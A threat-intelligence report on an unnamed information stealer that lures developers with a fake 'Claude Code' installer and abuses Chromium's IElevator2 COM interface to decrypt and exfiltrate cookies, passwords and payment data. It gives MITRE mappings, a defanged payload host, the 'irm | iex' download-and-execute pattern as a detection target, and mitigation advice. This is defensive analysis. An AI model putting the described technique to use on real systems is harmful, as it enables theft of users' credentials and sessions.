Full Report
New IElevator2 COM interface? No problem
Analysis Summary
# Tool/Technique: Unnamed IElevator2 Cookie Stealer (Claude Code Lure)
## Overview
This is a sophisticated, undocumented malware campaign specifically targeting developers. It utilizes a fake "Claude Code" installer lure to execute an obfuscated PowerShell loader. The malware's primary innovation is the abuse of the **IElevator2 COM interface**, a security feature introduced by Google in January 2026 to protect Chromium App-Bound Encryption (ABE) keys. By hijacking this interface, the malware decrypts and exfiltrates sensitive browser data, including session cookies, saved passwords, and payment information.
## Technical Details
- **Type:** Information Stealer / Malware
- **Platform:** Windows (Targeting Chromium-based browsers: Chrome, Edge, Brave, Vivaldi, Opera)
- **Capabilities:** Credential theft, cookie exfiltration, App-Bound Encryption (ABE) bypass, in-memory data staging.
- **First Seen:** April/May 2026
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
- [T1589.002 - Gather Victim Identity Information: Digital Certificates]
- [T1204.001 - User Execution: Malicious Link]
- **[TA0002 - Execution]**
- [T1059.001 - Command and Scripting Interpreter: PowerShell]
- **[TA0004 - Privilege Escalation]**
- [T1546.015 - Event Triggered Execution: Component Object Model Hijacking]
- **[TA0006 - Credential Access]**
- [T1539 - Steal Web Session Cookie]
- [T1555.003 - Credentials from Web Browsers]
- **[TA0010 - Exfiltration]**
- [T1041 - Exfiltration Over C2 Channel]
## Functionality
### Core Capabilities
- **Search Engine Deception:** Uses sponsored search results for coding tools (e.g., "Claude Code") to lead victims to phishing sites.
- **Conditional Content Rendering:** The malicious PowerShell command is rendered directly into the HTML of the landing page, allowing the hosted file to appear "clean" to automated scanners and `curl` requests.
- **Credential Decryption:** Targets the `IElevator2` COM interface to retrieve App-Bound Encryption keys used to protect SQLite databases in Chromium browsers.
- **Browser Compatibility:** If `IElevator2` is unavailable, it automatically falls back to legacy `IElevator` interfaces to ensure decryption.
### Advanced Features
- **In-Memory Execution:** Uses an obfuscated PowerShell loader to inject a native ABE helper module into a live browser process, minimizing the on-disk footprint.
- **Mojo IPC Simulation:** The native helper communicates exfiltrated data using a pipe formatted to mimic legitimate Chromium Mojo IPC (Inter-Process Communication) naming conventions to evade behavioral detection.
- **ABE Oracle Model:** Operates as a "split" malware where the native PE performs only one task (acting as an encryption oracle), pushing all other detectable activity into the PowerShell layer.
## Indicators of Compromise
- **File Names:** `secure_prefs.zip` (In-memory archive used for staging exfiltration).
- **Network Indicators:**
- `events[.]msft23[.]com` (Malicious redirection/payload host)
- `claude[.]ai/install.ps1` (Legitimate URL used as part of the lure)
- **Behavioral Indicators:**
- PowerShell processes initiating COM calls to `IElevator` or `IElevator2` interfaces.
- Named pipes using Chromium Mojo naming conventions created by non-standard processes.
- Unexpected injection into `chrome.exe`, `msedge.exe`, or other browser processes.
## Associated Threat Actors
- **Unknown:** Researchers noted similarities to "Glove Stealer" regarding the use of a native helper and named pipes, but the orchestration and IElevator2 implementation are distinct.
## Detection Methods
- **Behavioral Detection:** Monitor for unauthorized Component Object Model (COM) calls specifically targeting the Chromium Elevation Service identifiers.
- **PowerShell Monitoring:** Enable Script Block Logging (Event ID 4104) to detect the obfuscated loader and the use of `irm` (Invoke-RestMethod) targeting suspicious domains.
- **Process Integrity:** Monitor browser processes for injection or the spawning of native helper modules that do not carry valid browser-vendor signatures.
## Mitigation Strategies
- **Endpoint Hardening:** Restrict PowerShell execution policies and monitor for "one-liner" download-and-execute commands (e.g., `irm | iex`).
- **Browser Security:** Utilize administrative templates to harden browser profiles; however, note that this malware targets legitimate OS-level elevation interfaces.
- **User Education:** Advise developers to verify installation commands only from official documentation/repositories and avoid clicking "Sponsored" search results for CLI tools.
## Related Tools/Techniques
- **Glove Stealer:** A similar stealer focused on ABE bypass via named pipes.
- **App-Bound Encryption (ABE) Bypass:** A general class of techniques focused on extracting keys from the Windows Data Protection API (DPAPI) protected by the browser's elevation service.